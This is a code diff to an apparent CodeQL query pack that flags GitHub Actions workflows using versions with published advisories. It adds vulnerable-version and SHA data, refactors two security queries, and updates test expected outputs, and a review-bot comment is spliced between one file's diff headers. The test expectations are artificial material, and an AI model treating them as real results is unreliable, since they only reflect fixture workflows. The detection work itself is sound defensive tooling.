+ - ["gradle/gradle-build-action", "v2.2.0", "e88ed3e650b26bd116cfee53cf198c1f6856682d", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.2.0-rc.2", "de51428ba55149e7c6f6957a566b8759efd425de", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.2.0-rc.1", "63bcd47c1be270a660a151ce2b7848b8730f06ef", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.2.0-beta.1", "26ea4afa082ddf7e3e5bcf6d12283111b6f3f837", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.1.7", "9b814496b50909128c6a52622b416c5ffa04db49", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.1.6", "116ac10f8131939c7e405884cb2456067b0479e9", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.1.5", "fec4a42eb0c83154e5c9590748ba8337949c5701", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.1.4", "0d13054264b0bb894ded474f08ebb30921341cee", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.1.3", "937999e9cc2425eddc7fd62d1053baf041147db7", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.1.2", "bc3340afc5e3cc44f2321809ac090d731c13c514", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.1.1", "b9c806c75d3cb8998f905077e62bb670e7fa7e02", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.1.0", "3edb3cb004617998d8cf56fe2ebf9d59602e713e", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.0.1", "996094e8e808208e5738e8413b3f55d24d1c1eb7", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.0.0", "4137be6a8bf7d7133955359dbd952c0ca73b1021", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.0-rc.3", "4e899835b3bddb7d01d3a988e6c53d67ec8a76e2", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.0-rc.2", "2a57ddf74a257b005f65f70cbf15e8e7f06292d9", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.0-rc.1", "db2b34260fe57577fec47305e78a20755eef0441", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.0-beta.7", "cba1833ddecbbee649950c284416981928631008", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.0-beta.6", "a94b9252d5d8ca83eed3f76a856f2ba046b1b3c6", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.0-beta.5", "263f84178a82449371326ba2c1d781bc4b4bb9ac", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.0-beta.4", "29894757f3fd1d4752e4efadb74896d39873a0ae", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.0-beta.3", "c000a0b58fe0ad402c613a864ea3ed26d6e88fd0", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.0-beta.2", "21dee7159020ab3140bebfd2280a6f34ef4e08ae", "2.4.2"]
+ - ["gradle/gradle-build-action", "v2.0-beta.1", "bebb162342333983b660d21f31c90f33950f5023", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.5.1", "b3afdc78a7849557ab26e243ccf07548086da025", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.5.0", "e0c2736e35d366e96bb202d1af817db9d562da2f", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.4.1", "3f3947669a3fe6883ed8dab14671bdc6042ec2d9", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.4.0", "579711fd3cd8691fbc0cab64db65e9c1e586658e", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.3.3", "90ccf054e6b9905f30f98c938bce4c6acd323b6b", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.3.2", "c6b57b9c8c4f72268b10f151623ce6a2855c6387", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.3.1", "791b98c5656178712736d390e91be71eadfe192e", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.3.0", "27da3e28b3c4cc84c9e7965dc2371f969e582049", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.2.1", "e220e54c83b8f1a546d8e6d598490231fe2bf64b", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.2.0", "720051268d4728af6b7e0defa8ed8097b20ef218", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.1.0", "d0c5f7955e911444399df5d044916a49bdccff00", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.0.2", "064f85c1568a6fd57b32d8f98c0dc9f237c59156", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.0.1", "6170f06e8dd334a7f6879781c2ed4889c4cc76bf", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1.0.0", "2d5ca45eab01ff2ce82777ab670ff2bd5d8cf8d5", "2.4.2"]
+ - ["gradle/gradle-build-action", "v1", "b3afdc78a7849557ab26e243ccf07548086da025", "2.4.2"]
+
+ # rlespinasse/github-slug-action
+ # https://github.com/advisories/GHSA-6q4m-7476-932w
+ # CVE-2023-27581
+ - ["rlespinasse/github-slug-action", "v4.4.1", "102b1a064a9b145e56556e22b18b19c624538d94", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v4.4.0", "a362e5fb42057a3a23a62218b050838f1bacca5d", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v4.3.2", "b011e83cf8cb29e22dda828db30586691ae164e4", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v4.3.1", "00198f89920d4454e37e4b27af2b7a8eba79c530", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v4.3.0", "9c3571fd3dba541bfdaebc001482a49a1c1f136a", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v4.2.5", "0141d9b38d1f21c3b3de63229e20b7b0ad7ef0f4", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v3.9.0", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v3.8.0", "4a00c29bc1c0a737315b4200af6c6991bb4ace18", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v3.7.1", "5150a26d43ce06608443c66efea46fc6f3c50d38", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v3.7.0", "ebfc49c0e9cd081acb7ba0634d8d6a711b4c73cf", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v3", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v3.x", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v2.x", "9d2c65418d6ecbbd3c08e686997b30482e9f4a80", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "v1.1.x", "fbf6d7b9c7af4e8d06135dbc7d774e717d788731", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "4.2.5", "0141d9b38d1f21c3b3de63229e20b7b0ad7ef0f4", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "4.2.4", "33cd7a701db9c2baf4ad705d930ade51a9f25c14", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "4.2.3", "1615fcb48b5315152b3733b7bed1a9f5dfada6e3", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "4.2.2", "4177734b38a3d59604747bf47e537ccb6bcb9cdf", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "4.2.1", "7a3b4c1766ad8e6d23ab37d33417392509ff84e2", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "4.2.0", "dbbe21b72b96929fe6e67275c332f43599b31274", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "4.1.0", "88f3ee8f6f5d1955de92f1fe2fdb301fd40207c6", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "4.0.1", "cd9871b66e11e9562e3f72469772fe100be4c95a", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "4.0.0", "bd31a9f564f7930eea1ecfc8d0e6aebc4bc3279f", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "3.6.1", "1bf76b7bc6ef7dc6ba597ff790f956d9082479d7", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "3.6.0", "172fe43594a58b5938e248ec757ada60cdb17e18", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "3.5.1", "016823880d193a56b180527cf7ee52f13c3cfe33", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "3.5.0", "4060fda2690bcebaabcd86db4fbc8e1c2817c835", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "3.4.0", "0c099abd978b382cb650281af13913c1905fdd50", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "3.3.0", "d1880ea5b39f611effb9f3f83f4d35bff34083a6", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "3.2.0", "c8d8ee50d00177c1e80dd57905fc61f81e437279", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "3.1.0", "e4699e49fcf890a3172a02c56ba78d867dbb9fd5", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "3.0.0", "6a873bec5ac11c6d2a11756b8763356da63a8939", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "2.2.0", "9d2c65418d6ecbbd3c08e686997b30482e9f4a80", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "2.1.1", "72cfc4cb1f36c102c48541cb59511a6267e89c95", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "2.1.0", "1172ed1802078eb665a55c252fc180138b907c51", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "2.0.0", "ca9a67fa1f1126b377a9d80dc1ea354284c71d21", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "1.2.0", "fbf6d7b9c7af4e8d06135dbc7d774e717d788731", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "1.1.1", "242e04c2d28ac5db296e5d8203dfd7dc6bcc17a9", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "1.1.0", "881085bcae8c3443a89cc9401f3e1c60fb014ed2", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "1.0.2", "a35a1a486a260cfd99c5b6f8c6034a2929ba9b3f", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "1.0.1", "e46186066296e23235242d0877e2b4fe54003d54", "4.4.1"]
+ - ["rlespinasse/github-slug-action", "1.0.0", "9671420482a6e4c59c06f2d2d9e0605e941b1287", "4.4.1"]
+
+ # Azure/setup-kubectl
+ # https://github.com/advisories/GHSA-p756-rfxh-x63h
+ # CVE-2023-23939
+ - ["Azure/setup-kubectl", "v2.1", "6025c840858f1afa584a5190a4426c338f59e503", "3"]
+ - ["Azure/setup-kubectl", "v2.0", "7ad2aa66bb42774adf65a0c580fbc96b2dadd747", "3"]
+ - ["Azure/setup-kubectl", "v1", "a625ca209b0faaa8871dac8fb5f50ee4b4d22622", "3"]
+
+ # gajira-create
+ # https://github.com/advisories/GHSA-4xqx-pqpj-9fqw
+ # CVE-2020-14188
+ - ["atlassian/gajira-create", "v2.0.0", "77d13eab156b8ad1c08c0655011b8a442c502998", "2.0.1"]
+ - ["atlassian/gajira-create", "v1.0.3", "14c3d657c383981ee595d9750f68d7e4e77d64d0", "2.0.1"]
+ - ["atlassian/gajira-create", "v1.0.1", "2cd32e0738e2b31717e7119717fed83e482d2a36", "2.0.1"]
+ - ["atlassian/gajira-create", "v1.0.0", "f11e88bf4a1358e741ac282bc198a4f21cb719a1", "2.0.1"]
+
+ # hashicorp/vault-action
+ # https://github.com/advisories/GHSA-4mgv-m5cm-f9h7
+ # CVE-2021-32074
+ - ["hashicorp/vault-action", "v2.1.2", "5e5c06a3c8e96b7c4757fe7a10e03469cdbd07bb", "2.2.0"]
+ - ["hashicorp/vault-action", "v2.1.1", "2fb78ab91e55be5479aacf74f7b451eab79773a4", "2.2.0"]
+ - ["hashicorp/vault-action", "v2.1.0", "2ca76a4465bca4f71fc88320e67551a287f7eaec", "2.2.0"]
+ - ["hashicorp/vault-action", "v2.0.1", "952d5d48e4448ad364651cc473aeccc25bd169d9", "2.2.0"]
+ - ["hashicorp/vault-action", "v2.0.0", "e27b45646f82a319c8157e545e24b7588510a397", "2.2.0"]
+ - ["hashicorp/vault-action", "v1.0.1", "22e3f3e09e3baba4d6cc62823175d21fafe4e30a", "2.2.0"]
+ - ["hashicorp/vault-action", "v1.0.0", "727494f451d57cbfc932a1d8bce1b0a027d99a8b", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.10.2", "9878eba70ad6c6e21a01bd1e2debd3f3b7cbc46e", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.10.1", "567ec72c33597ee9feca8bed4611a8ace38330c2", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.10.0", "5c464962be8937589f883cf209d21b3982c92360", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.9.0", "50ece41861b565239528923369690fc43cc0050b", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.8.0", "4ab6f6070f5be6702101c9736961beb8105e8708", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.7.0", "4edbc9a77a84bd34b0da2e8b8d527871b6103aae", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.6.2", "7d1d7d26adb265e6ebc6018ce2b92be7c5a7c63c", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.6.1", "f9753d75ef0cdafe621cda2323b5dcc4d673d01a", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.6.0", "0188d9d223dac8b24b94b04d3253bf0fe0365ca7", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.5.0", "f229481670b4719a05f01e8fd8478c191a373c43", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.4.0", "3b9239de79207bf3fba80a16916f257918ab1d15", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.3.1", "ab4dc55b2ecc6eb5926c5caffa45eaf0c3ad735a", "2.2.0"]
+ - ["hashicorp/vault-action", "v0.3.0", "3747195c5f2848179bf615690b3e66e69a5e4dc7", "2.2.0"]
+ - 
["hashicorp/vault-action", "v0.2.2", "da9a93f3f5bec24febf304139a6cbe61f0f8ad5e", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.1", "6784ab38963b266384880094ff02eb13334802f4", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.0", "6784ab38963b266384880094ff02eb13334802f4", "2.2.0"] + - ["hashicorp/vault-action", "v0.1.0", "19c0b21a1ddb75543178ac4a250b5b7cff7fd55a", "2.2.0"] + + # check-spelling/check-spelling + # https://github.com/advisories/GHSA-g86g-chm8-7r2p + # CVE-2021-32724 + - ["check-spelling/check-spelling", "v0.0.18", "08f08a6ff6b9ebae06cb8fe463374a8a5a37e03c", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.17-alpha", "ead83f4596b4aac06f698b501b5beb3218f6214d", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.16-alpha", "5f7f35b25e6bce7b1e5a8f226369a86ab19a623e", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.15-alpha", "d8f2d9ec30e38ffae03410088062714ac04c36cd", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.14-alpha", "67ea89eaff703694453dbfd346c4c31dfab646fc", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.13-alpha", "a9db57b850b66cb664373f19f6628c4ee39fbcb5", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.12-alpha", "22b3d11338aea9482eda87725ab15b8862de4061", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.11-alpha", "10d8401e72f7b4752a765b61ecbd1539394d6f4e", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.10-alpha", "c79ba85e2b8e45ef0a8da9eb0d16e7f2135ad2c6", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.9-alpha", "13d6bbcc0a082113d1c2d33ea41fcbe915e62de9", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.8-alpha", "6505ab5f1ebbe080fc072ea3cf68bac289f419ac", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.7-alpha", "a27e3104c5c8d69c2986d22c938e679ec0f1b2c7", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.6-alpha", "8a7dfc447cd58195531f7c313f6ff693f0e2eb89", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.5-alpha", "e584b835f290270af78538013634f348d6cc7398", "0.0.19"] + - 
["check-spelling/check-spelling", "0.0.4-alpha", "cb465b08587798aa788dfd9bc345c2c982ac9e29", "0.0.19"]
+ - ["check-spelling/check-spelling", "0.0.3-alpha", "b8e280ae90b28f1aadc50f93073aa6450afe820d", "0.0.19"]
+ - ["check-spelling/check-spelling", "0.0.2-alpha", "8e32de8a016bc4dce4170ec36881cbb315f94ff4", "0.0.19"]
+ - ["check-spelling/check-spelling", "0.0.1-alpha", "d2d0ee06c72600982d2f80bca187ce90fee6ad94", "0.0.19"]
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 93f6688d2b41..856fbaebb193 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.27
+version: 0.1.28
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql
index 16404edc5000..c0a81b66a480 100644
--- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql
+++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql
@@ -12,37 +12,8 @@ */
 import actions
+import codeql.actions.security.UseOfKnownVulnerableActionQuery
-abstract class KnownVulnerableAction extends UsesStep {
- abstract string getFixedVersion();
-}
-
-class ActionsDownloadArtifact extends KnownVulnerableAction {
- ActionsDownloadArtifact() {
- this.getCallee() = "actions/download-artifact" and
- (
- this.getVersion() =
- [
- "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1",
- "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6",
- "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0",
- ]
- or
- this.getVersion()
- .matches([
- "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4",
- "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e",
- "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c",
- "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591",
- "18f0f591", "18f0f591",
- ] + "%")
- )
- }
-
- override string getFixedVersion() { result = "4.1.7" }
-}
-
-// gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate
 from KnownVulnerableAction step
 select step, "The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@", step,
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql
index bf7623ef2600..a50c47a97935 100644
--- a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql
+++ b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql
@@ -14,28 +14,15 @@ import actions
 import codeql.actions.security.PoisonableSteps
+import codeql.actions.security.UseOfKnownVulnerableActionQuery
-from UsesStep download
+from UsesStep download, KnownVulnerableAction vulnerable_action
 where
- download.getCallee() = "actions/download-artifact" and
+ vulnerable_action.getVulnerableAction() = download.getCallee() and download.getCallee() = "actions/download-artifact" and
 (
- download.getVersion() =
- [
- "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1",
- "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6",
- "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0",
- ]
- or
- download
- .getVersion()
- .matches([
- "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4",
- "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e",
- "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c",
- "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591",
- "18f0f591", "18f0f591",
- ] + "%")
+ download.getVersion() = vulnerable_action.getVulnerableVersion() or
+ download.getVersion() = vulnerable_action.getVulnerableSha()
 ) and
 (
 // exists a poisonable upload artifact in the same workflow
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 6ceb57f09461..73dff5a1dc8c 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.27
+version: 0.1.28
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected
index 4749fc358173..a89ef0bfbe5e 100644
--- a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected
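Review bot: The SHA branch of the new version check, `download.getVersion() = vulnerable_action.getVulnerableSha()`, requires the workflow ref to equal the stored value exactly, whereas the removed code matched 8-character prefixes with `.matches(... + "%")`; the action data introduced in this commit appears to store full 40-character commits, so a step pinned to an abbreviated SHA would no longer match and silently drop out of the results. If short pins are meant to stay covered, match on prefix as well, e.g. `download.getVersion().length() >= 7 and vulnerable_action.getVulnerableSha().prefix(download.getVersion().length()) = download.getVersion()`. The same equality is presumably used inside `UseOfKnownVulnerableActionQuery`, which is not part of this diff, and the `where` clause of this query continues outside the hunk.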
+++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected 
@@ -1,9 +1,9 @@ -| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
Update it to $@ | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:10:9:11:6 | Uses Step | v1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:11:9:12:6 | Uses Step | v1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:12:9:13:6 | Uses Step | v2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
Update it to $@ | .github/workflows/test1.yml:13:9:14:6 | Uses Step | v2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:14:9:15:6 | Uses Step | v3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:15:9:16:6 | Uses Step | v3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:16:9:17:6 | Uses Step | v4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.7 | | .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 4.1.7 | | .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
Update it to $@ | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 4.1.7 | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 70eb169860e6..665e9626b247 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,20 +1,20 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | -| 